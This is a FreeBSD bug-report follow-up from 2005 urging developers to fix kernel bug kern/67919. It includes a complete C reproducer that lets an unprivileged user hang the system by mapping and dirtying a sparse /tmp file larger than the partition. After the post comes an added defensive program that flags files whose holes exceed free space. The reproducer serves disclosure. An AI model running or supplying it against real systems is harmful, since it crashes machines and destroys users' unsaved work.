kern/67919: Why nobody take serious to fix this bug?
Cai, Quanqing
caiquanqing at gmail.com
Sun Oct 30 23:20:14 PST 2005
The following reply was made to PR kern/67919; it has been noted by GNATS.
From: "Cai, Quanqing" <caiquanqing at gmail.com>
To: freebsd-current at freebsd.org, bug-followup at FreeBSD.org
Cc: Igor Sysoev <is at rambler-co.ru>, Edwin Groothuis <edwin at mavetju.org>,
Uwe Doering <gemini at geminix.org>
Subject: Re: kern/67919: Why nobody take serious to fix this bug?
Date: Sun, 30 Oct 2005 21:28:22 -0800
Today I happened to read this message on freebsd-stable:
http://lists.freebsd.org/pipermail/freebsd-stable/2005-October/019086.html

After reading all the messages and related links, I feel so frustrated. Why
does nobody take fixing this bug seriously, even though we have a patch for
it? I can reproduce this bug on 7.0-CURRENT and 6.0-RC1 easily as a normal
user! The system stops responding, so I have to power cycle it. The patch
made by Uwe Doering actually works well. This bug looks like a security hole
to me :( If you guys don't like this patch, please give a reason and come up
with a better patch or solution.

For the impatient, you can run this to crash your system (7.x, 6.x, 5.x); you
have to increase FILELEN to a size greater than your /tmp partition:
===============================================
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <err.h>
#include <sys/types.h>
#include <sys/mman.h>

#define FILENAME "/tmp/test"	/* where to put the test file */
#define FILELEN 710		/* test file length in MB */

int
main(void)
{
	int fd;
	size_t len;
	char *buf, *p, *lim;

	len = FILELEN * 1024 * 1024;

	if ((fd = open(FILENAME, O_RDWR|O_CREAT|O_TRUNC, 0666)) == -1)
		err(2, "open() failed");

	/* Extend the file to len bytes without writing any data. */
	if (ftruncate(fd, len) == -1)
		err(2, "ftruncate() failed");

	buf = mmap(NULL, len, PROT_WRITE, MAP_SHARED, fd, 0);
	if (buf == MAP_FAILED)
		err(2, "mmap() failed");
	(void)close(fd);

	/* Dirty one byte in every 4096-byte step of the mapping. */
	for (p = buf, lim = p + len; p < lim; p += 4096)
		*p = '0';

	if (munmap(buf, len) == -1)
		err(2, "munmap() failed");

	exit(0);
}
===============================================
Cai, Quanqing
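
A defensive check for the precondition the reproducer above sets up: a regular file whose length exceeds the blocks allocated to it by more than the filesystem has free. This is an added example, not code from the post or from Uwe Doering's patch; `check_path` and the two helpers are hypothetical names, and `st_blocks` is assumed to count 512-byte units.

```c
#include <stdint.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/statvfs.h>

/* Bytes of the file's apparent length that have no disk blocks behind them.
 * Assumption: st_blocks is in 512-byte units. */
static uint64_t unbacked_bytes(uint64_t size, uint64_t blocks512)
{
    uint64_t backed = blocks512 * 512;
    return size > backed ? size - backed : 0;
}

/* 1 if filling every hole would need more space than an unprivileged
 * user can still allocate on the filesystem (f_bavail * f_frsize). */
static int holes_exceed_free(uint64_t size, uint64_t blocks512,
                             uint64_t bavail, uint64_t frsize)
{
    return unbacked_bytes(size, blocks512) > bavail * frsize;
}

/* Hypothetical helper: 1 = holes exceed free space, 0 = fine, -1 = error. */
int check_path(const char *path)
{
    struct stat st;
    struct statvfs vfs;

    if (stat(path, &st) == -1 || statvfs(path, &vfs) == -1)
        return -1;
    if (!S_ISREG(st.st_mode))
        return 0;
    return holes_exceed_free((uint64_t)st.st_size, (uint64_t)st.st_blocks,
                             (uint64_t)vfs.f_bavail, (uint64_t)vfs.f_frsize);
}

int main(int argc, char **argv)
{
    /* Report each path given on the command line, e.g. files under /tmp. */
    for (int i = 1; i < argc; i++) {
        int r = check_path(argv[i]);
        printf("%s: %s\n", argv[i],
               r < 0 ? "error" : r ? "holes exceed free space" : "ok");
    }
    return 0;
}
```

Filesystems that compress or deduplicate data report fewer allocated blocks than the file's length, so a hit from this check is a prompt to look at the file, not proof of abuse.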